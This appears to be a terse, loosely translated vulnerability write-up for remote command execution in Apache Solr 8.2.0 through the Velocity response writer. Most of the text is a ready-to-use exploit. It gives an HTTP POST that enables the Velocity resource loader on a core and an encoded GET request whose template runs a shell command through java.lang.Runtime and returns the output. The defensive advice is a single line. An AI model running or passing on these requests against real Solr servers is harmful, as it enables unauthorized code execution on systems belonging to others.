Vulnerability Details
Author S00pY 666 !! If you know the Core path, modifying the configuration file by the POST data packet, the command can be executed remotely. Solr-8.2.0 test uses the latest version of the visual impact of the full version.
Using the premise that
there is unauthorized access solr.
Vulnerability reproduction
Core Admin application to get access path, vulnerability reproduce stepped pit: If Add Core error, the /solr-8.2.0/server/solr/configsets/_defaultconf files in the folder to new_corefolder can be.
Open params.resource.loader.enabled
POST /solr/new_core/config HTTP/1.1
Host: 10.211.55.13:8983
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
Command execution
GET /solr/new_core/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 10.211.55.13:8983
defense
Forbidden solr.